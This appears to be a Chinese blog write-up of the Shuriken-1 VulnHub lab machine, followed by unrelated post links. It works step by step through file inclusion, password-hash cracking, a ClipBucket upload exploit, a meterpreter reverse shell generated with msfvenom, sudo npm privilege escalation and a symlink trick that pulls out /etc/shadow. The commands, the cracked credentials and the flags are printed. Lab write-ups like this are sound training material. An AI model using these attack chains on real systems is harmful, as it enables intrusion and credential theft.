Shuriken-1靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/shuriken/Shuriken-1.ova

  1. 将Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口

  2. 通过开放的80端口,打开网站

  3. 信息收集,发现js文件存在两个链接

  4. 尝试去打开链接,发现了一个存在文件包含的地方

    Broadcas.shuriken.local无法直接打开,需要加到hosts文件中

    打开网站后发现需要登录

  5. 尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码

    /etc/apache2/sites-enabled/000-default.conf
    


    读取到了密码

    developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
    

  6. 接下来就是对密码的破解,这里利用john工具

    john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash
    john --show  /home/kali/Desktop/hash
    

    破解后的密码: 9972761drmfsls

    并且登录后发现是ClipBucket 4.0

  7. 尝试去网上搜寻符合符合的漏洞,在exploit网站找到一个,可以文件上传的exploit

    curl --basic --user "developers:9972761drmfsls" -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"  http://broadcast.shuriken.local/actions/beats_uploader.php
    

  8. 准备要上传的文件,这里上传一个msfvenom生成的shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o  /home/kali/Desktop/shell.php
    


  9. 通过上传成功后返回的文件名和后缀加路径,可以找到上传的php文件,并且运行
    http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/

  10. 在kali里面利用msf开启监听,成功连接shuriken靶机

  11. 当前用户是www-data,考虑提权,经过发现,使用sudo –l 命令
    看到了server-management用户无密码使用npm命令,存在sudo滥用提权

    并且在https://gtfobins.github.io/找到了对应的提权命令

    touch package.json
    echo '{"scripts":{"dev":"/bin/bash"}}' > package.json
    sudo -u server-management npm run dev
    

    成功提权到server-management用户

  12. 在server-management用户的家目录下发现了user.txt
    获得了第一个flag
    67528b07b382dfaa490f4dffc57dcdc0

  13. 紧接着考虑提权至root的方法
    这里没有找到提权的方法
    但是发现了一个奇怪的进程

    经过查看backupsrv.sh内容
    大概理解这个进程的作用是,在/var/backups目录下生成一个tgz文件
    文件名字是时间和主机名字的组合
    并且tgz文件的内容是/home/server-management/Documents目录里面的内容

  14. 利用这点,我们可以下载/etc的文件
    观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents文件夹,做了/etc到Documents的软连接,压缩成功后将其拷贝到/var/www/main(注意:需切换到www-data用户),下载后获取到shadow文件


    cp /var/backups/shuriken-Sunday.tgz /var/www/main

  15. 下载之后,对应的tgz文件内容是对应的/etc的文件内容,在里面打开了shadow文件,获取了root的密码,但是这里不会解密

    $6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0
    

  16. 无法解密,直接同步骤将/root文件下载下来,打开里面的root.txt文件
    获取了第二个flag
    d0f9655a4454ac54e3002265d40b2edd

Shuriken-1靶机总结相关推荐

  1. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  2. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  3. HA: InfinityStones靶机渗透测试

    文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...

  4. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  5. HA: Dhanush靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...

  6. Lampiao靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...

  7. 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器

    这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...

  8. docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介

    在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...

  9. php %3c php 攻击,web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

最新文章

  1. CentOS7搭建NTP服务器
  2. Spring学习之旅(四):面向切面编程(AOP)
  3. Linux中使用Systemtap调试SLUB
  4. linux重启python服务_如何将python脚本作为linux服务启动
  5. vue 开发中element-ui库的switch开关绑定number类型数据不成功问题 解决方法
  6. 学python后到底能干什么-学Python后到底能干什么
  7. 《游戏编程模式》一第7章 状态模式
  8. Java之品优购课程讲义_day09(2)
  9. 【AT91SAM9261EK】u-boot 2022 tftpboot 烧写根文件系统
  10. Android速度仪表盘,速度评级小车动画(模仿电脑版360宽带测速器)
  11. 关于阿里云短信验证服务完整的教程
  12. NumberOptional:一个字符串转数字的工具
  13. 用java实现楼层导航_楼层导航
  14. 1080p和1080i
  15. 手把手教你用jQuery Mobile做相册
  16. 使用FFMpeg将音频PCM数据生成WAV和MP3文件
  17. VirtualBox错误:VERR_NEM_VM_CREATE_FAILED: What do I do?
  18. 【读书笔记】描述个人优势的34个主题--《现在,发现你的优势》
  19. 航空发动机数据-C-MAPSS数据集的个人理解
  20. iOS开发之Objective-C(面试篇)-李飞-专题视频课程

热门文章

  1. matlab中性点模块,Matlab-SimPowerSystems-Elements模块使用说明
  2. 解决UnicodeDecodeError: 'ascii' codec can't decode byte 0xcf in position 7: ordinal not in range(128)
  3. 读《现代软件工程基础》后三问
  4. 【DEVOPS】传统业务软件企业之痛
  5. 2019 Android手机系统版本分布情况
  6. VMware虚拟机IP地址不分配
  7. ssh连接mysql数据库导入_ssh向数据库导入数据库
  8. N76E003,C51开发不编译
  9. Ubuntu 18.04上安装Skype
  10. Adobe 使用 AI 识别 PS “照骗”;Java 要被 kotlin 打败了?